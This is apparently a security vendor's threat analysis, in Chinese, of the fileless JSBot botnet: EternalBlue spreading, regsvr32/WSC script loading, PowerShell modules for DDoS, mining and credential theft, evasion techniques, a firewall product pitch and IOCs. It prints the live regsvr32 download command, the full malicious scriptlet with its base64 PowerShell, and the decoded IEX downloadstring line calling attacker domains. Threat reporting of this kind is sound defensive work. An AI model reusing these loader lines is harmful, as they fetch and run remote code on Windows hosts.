JSBot无文件攻击,云安全网络全链路防御

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
云安全中心 防病毒版,最高20核 3个月
云安全中心 免费版,不限时长
简介: 近日,阿里云安全监测到一种利用Javascript无文件技术实现C&C通信的新型僵尸网络,其核心交互无文件落盘并由JS加载下载Powershell脚本内存执行各类恶意操作,阿里云安全专家分析发现,该僵尸网络利用永恒之蓝漏洞进行扫描入侵,对主机、用户资产危害极大。

概述


近日,阿里云安全监测到一种利用Javascript无文件技术实现C&C通信的新型僵尸网络,其核心交互无文件落盘并由JS加载下载Powershell脚本内存执行各类恶意操作,由于核心使用了WSC技术我们将其命名为JSBot。


阿里云安全专家分析发现,该僵尸网络利用永恒之蓝漏洞进行扫描入侵,通过WSC(Windows Scripting Component)技术下载并执行核心Powershell脚本,实现文件下载、上传、对外DDoS、挖矿、盗取密码等功能,对主机、用户资产危害极大。


阿里云安全持续对该BOT进行监控,发现近期传播有所上升,提醒广大用户注意防护。1627550750329-c997bf7a-ab95-4958-86d8-5c5f65f5757c.png

传播手段


JSBOT通过MS17-010漏洞进行入侵和传播,利用WSC技术实现无文件化的维持和后续攻击,通过从云端下载经过编码的二进制文件,实现对外DDoS和挖矿行为,通过Powershell核心函数实现对失陷主机的下载、发送文件、WMIExec等功能。


20210730141455.jpg

阶段分析


20210730141616.jpg


详细分析


JSBot通过MS17-010漏洞入侵主机内部后,通过进行svchost.exe执行命令派生cmd进程。该命令从域名cat.xiaoshabi.nl下载一段XML文件,该文件使用JavaScript编写的COM组件WSC(Windows Scripting Component),由于脚本文件不能被编译,只能运行于Windows系统的脚本宿主机WSH(Windows Scripting Host)中,全程文件不落盘,这也给文件查杀、木马清理带来了难度。其执行的命令如下:


C:\\Windows\\system32\\regsvR32.EXE /u/s/i:http://cat.xiaoshabi.nl/networks.xsl scrobj.dll


文件名为networks.xsl的XML文件内容如下,通过新建 ActiveXObject("WScript.Shell").Run(ps,0,true) 执行一段powershell经过Base64加密的脚本


<?XML version="1.0"?>

<scriptlet>

<registration

    progid="Test"

    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >

    <!-- Learn from Casey Smith @subTee -->

    <script language="JScript">

        <![CDATA[

            ps  = "cmd.exe /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBzAGkAeAAuAHgAaQBhAG8AagBpAGoAaQAuAG4AbAAvAG4AZQB0AHcAbwByAGsAcwAuAHAAcwAxACcAKQApAA==";             new ActiveXObject("WScript.Shell").Run(ps,0,true);

        ]]>

</script>

</registration>

</scriptlet>


其中命令部分经base64解码后内容如下,JSBot从 six.xiaojiji.nl 域名下载进过混淆的脚本 networks.ps1


IEX ((new-object net.webclient).downloadstring('http://six.xiaojiji.nl/networks.ps1'))


networks.ps1包含三个参数,参数经过过base64或混淆


20210730142010.jpg

对文件进行解码后参数功能可以归结如下20210730142057.jpg

$ffffff解码出的核心函数

函数Download_File,调用[System.IO.File]::WriteAllBytes("$env:temp$Filename", $temp)从失陷主机下载文件

20210730142208.jpg

函数RunDDOS,从 http://xxx.xxx.xxx.xxx/cohernece.txt 下载DDOS文件到C:\Windows\TEMP\cohernece.exe目录并执行

20210730142250.jpg

函数RunXMR,从 http://xxx.xxx.xxx.xxx/steam.txt 下载挖矿木马并执行20210730142328.jpg

函数Get-creds,盗取内存中的秘钥

20210730142509.jpg

函数Scan,利用MS17-010对外进行扫描

20210730142549.jpg

整体解码后可以得到JSBot如下核心功能

20210730142632.jpg

$miiiiii参数解码二进制

Dll导出函数中包含powershell_reflective_mimikatz

20210730142738.jpg

文件中对该Mimikatz工具进行了集成

20210730142820.jpg

逃逸手段分析

JSBot为了规避检测在整体流程中采用了多种组合方式,其中比较典型的有以下几类

无文件内存化运行

JSBot通过regsvR32执行命令,调用scrobj.dll的DllInstall函数,将URL中所带的COM组件写入注册表中,由于脚本运行于Windows平台上的脚本宿主机WSH(Widnows Scripting Host),故文件可以不落盘。

C:\\Windows\\system32\\regsvR32.EXE /u/s/i:http://cat.xiaoshabi.nl/networks.xsl scrobj.dll


而在Powershell脚本中JSBot通过一系列函数在内存空间中将PE写入,同样实现了无文件落盘的操作,如图写内存函数

20210730142956.jpg

程序执行入口

20210730143033.jpg

JSBot使用WMIExec来远程执行命令,Windows系统默认不会在日志中记录这些操作,可以做到无日志,攻击脚本无需写入磁盘。

20210730143117.jpg

脚本多层多类型混淆

JSBot对核心函数做了两次混淆,核心功能在参数$ffffff中,同时针对Powershell使用了任意大小写、反引号、拼接等多种混淆手段,增加分析和检测难度。

20210730143209.jpg

二进制编码内存还原

JSBot从远程服务下载二进制时,对二进制文件进行了文本化,以逃避网络侧流量的检测,在脚本中再进行解码还原,如下为下载的DDoS木马。

20210730143303.jpg

Powershell中对二进制文件进行还原函数如下

20210730143409.jpg

安全解决方案

云防火墙利用图计算结合流实时计算,可以在近实时对攻击报文进行分析,依赖图计算存储的亿级IOC节点对外联IP、域名、URL进行团伙化标签,依托流实时化分析系统得到团伙攻击Payload、攻击URL、攻击端口等信息,有效提升对蠕虫木马类攻击的检测防御能力。当前云防火墙支持对JSBOT进行防御与检测。


20210730143605.jpg

云防火墙主动外联功能结合阿里云千万级别活跃IP、域名威胁情报库(包含勒索软件、间谍软件、僵尸网络、木马后门等分类),对外联IP、域名进行实时监控,通过“建议操作”可以查看实时流量日志或通过智能策略对外联、域名进行管控、封禁,保障您的资产不遭受更大的损失。

20210730143807.jpg

IOC

IP

5.180.96.187

Domain

cat.dashabi.in

skt.dashabi.nl

safe.lxb.monster

cat.xiaojiji.nl

skt.xiaojiji.nl

sec.xiaojiji.nl

URL

hxxp://cat.dashabi.in/networks.xsl

hxxp://sec.dashabi.in/javaw2/net/net.xsl

hxxp://sec.dashabi.in/javaw2/instance.xsl

hxxp://skt.dashabi.nl/networks.xsl

hxxp://cat.xiaojiji.nl/cohernece.txt

hxxp://cat.xiaojiji.nl/sys.txt

hxxp://skt.xiaojiji.nl/ver.txt

hxxp://cat.xiaojiji.nl/access.txt

hxxp://cat.xiaojiji.nl/monhash.txt

hxxp://cat.xiaojiji.nl/net/net.xsl

hxxp://cat.xiaojiji.nl/minhash.txt

hxxp://cat.xiaojiji.nl/nssmhash.txt

hxxp://cat.xiaojiji.nl/uas.txt

hxxp://cat.xiaojiji.nl/nssm.txt

hxxp://cat.xiaojiji.nl/ver.txt

hxxp://cat.xiaojiji.nl/min.txt

hxxp://cat.xiaojiji.nl/mon.txt

hxxp://sec.xiaojiji.nl/javaw2/instance.ps1

hxxp://sec.xiaojiji.nl/javaw2/javaw

hxxp://sec.xiaojiji.nl/javaw2/WinRing0x64.sys

hxxp://cat.xiaojiji.nl/networks.ps1

hxxp://cat.xiaojiji.nl/networks.xsl

hxxp://cat.xiaojiji.nl:80/net/net.xsl

hxxp://sec.xiaojiji.nl/javaw2/net/net.xsl

hxxp://six.xiaojiji.nl/networks.ps1

hxxp://six.xiaojiji.nl/networks.xsl

hxxp://skt.xiaojiji.nl/list.ps1

hxxp://skt.xiaojiji.nl/networke.ps1

hxxp://skt.xiaojiji.nl/networke.xsl

hxxp://skt.xiaojiji.nl/networks.ps1

hxxp://skt.xiaojiji.nl/networks.xsl

hxxp://safe.lxb.monster/networke.xsl

hxxp://safe.lxb.monster/networks.xsl

MD5

fdf5976964d0c42e4f5b490a2a7dd0c6

8c26218931c743a36987e07af7fc35f4

0ef5da9757386de38b1eb20e1ba0dc45

相关文章
|
11天前
|
SQL 安全 网络安全
网络安全的护城河:漏洞防御与加密技术的深度解析
【10月更文挑战第37天】在数字时代的浪潮中,网络安全成为守护个人隐私与企业资产的坚固堡垒。本文将深入探讨网络安全的两大核心要素——安全漏洞和加密技术,以及如何通过提升安全意识来强化这道防线。文章旨在揭示网络攻防战的复杂性,并引导读者构建更为稳固的安全体系。
26 1
|
20天前
|
SQL 安全 测试技术
网络安全的盾牌与剑——漏洞防御与加密技术解析
【10月更文挑战第28天】 在数字时代的浪潮中,网络空间安全成为我们不可忽视的战场。本文将深入探讨网络安全的核心问题,包括常见的网络安全漏洞、先进的加密技术以及提升个人和组织的安全意识。通过实际案例分析和代码示例,我们将揭示黑客如何利用漏洞进行攻击,展示如何使用加密技术保护数据,并强调培养网络安全意识的重要性。让我们一同揭开网络安全的神秘面纱,为打造更加坚固的数字防线做好准备。
39 3
|
1月前
|
安全 数据安全/隐私保护
谨防二维码陷阱:揭秘网络钓鱼攻击与保护措施
当我们深入了解二维码的世界时,了解它们的特性和潜在风险变得至关重要,揭示了伴随其广泛普及的更为阴暗的一面
|
18天前
|
安全 算法 网络安全
网络防御的艺术:揭秘加密技术与安全意识的重要性
【10月更文挑战第30天】在数字化时代,网络安全已成为我们生活中不可或缺的部分。本文旨在揭示网络安全漏洞的成因,探讨如何通过加密技术和提升安全意识来构建坚固的网络防线。文章将深入分析常见的安全威胁,并分享实用的防护策略,帮助读者在日益复杂的网络环境中保持警觉和安全。
64 29
|
6天前
|
存储 SQL 安全
网络防御的盾牌与剑:探索网络安全漏洞、加密技术及安全意识的重要性
【10月更文挑战第42天】在数字时代的浪潮中,网络安全成为保护个人隐私、企业资产和国家安全的关键。本文将深入分析网络安全漏洞的根源,探讨加密技术如何为数据提供护盾,并强调提升全民网络安全意识的必要性。通过深入浅出的讲解和实际案例,我们旨在构建一道坚固的网络防线,为抵御网络威胁提供策略和工具。
|
14天前
|
存储 安全 网络安全
如何识别和防范网络钓鱼攻击?
通过以上方法的综合运用,可以有效识别和防范网络钓鱼攻击,降低遭受网络安全威胁的风险,保护个人信息和财产安全。
45 12
|
28天前
|
存储 安全 网络安全
网络安全的屏障与钥匙:漏洞防御与加密技术深度解析
【10月更文挑战第20天】在数字世界的迷宫中,网络安全是守护我们数据宝藏的坚固盾牌和锋利钥匙。本篇文章将带您穿梭于网络的缝隙之间,揭示那些潜藏的脆弱点—网络安全漏洞,同时探索如何通过现代加密技术加固我们的数字堡垒。从基本概念到实战策略,我们将一同揭开网络安全的神秘面纱,提升您的安全意识,保护个人信息不受侵犯。
51 25
|
9天前
|
SQL 安全 网络安全
网络安全的盾牌与矛:探索漏洞防御与加密技术
【10月更文挑战第39天】在数字时代的浪潮中,网络安全成了守护个人隐私与企业资产的坚固盾牌。本文将带你深入了解网络安全的两大支柱——漏洞防御与加密技术。我们将从基础概念入手,逐步揭示网络攻击者如何利用安全漏洞发起攻击,同时探讨防御者如何通过加密技术和安全意识的提升来构建坚不可摧的防线。你将学习到如何识别常见的安全威胁,以及采取哪些实际措施来保护自己的数字足迹。让我们共同铸就一道网络安全的长城,为信息时代保驾护航。
|
10天前
|
机器学习/深度学习 人工智能 安全
AI与网络安全:防御黑客的新武器
在数字化时代,网络安全面临巨大挑战。本文探讨了人工智能(AI)在网络安全中的应用,包括威胁识别、自动化防御、漏洞发现和预测分析,展示了AI如何提升防御效率和准确性,成为对抗网络威胁的强大工具。
|
15天前
|
安全 网络安全 数据安全/隐私保护
社会工程学攻击:了解并预防心理操控的网络欺诈
社会工程学攻击:了解并预防心理操控的网络欺诈
34 7

热门文章

最新文章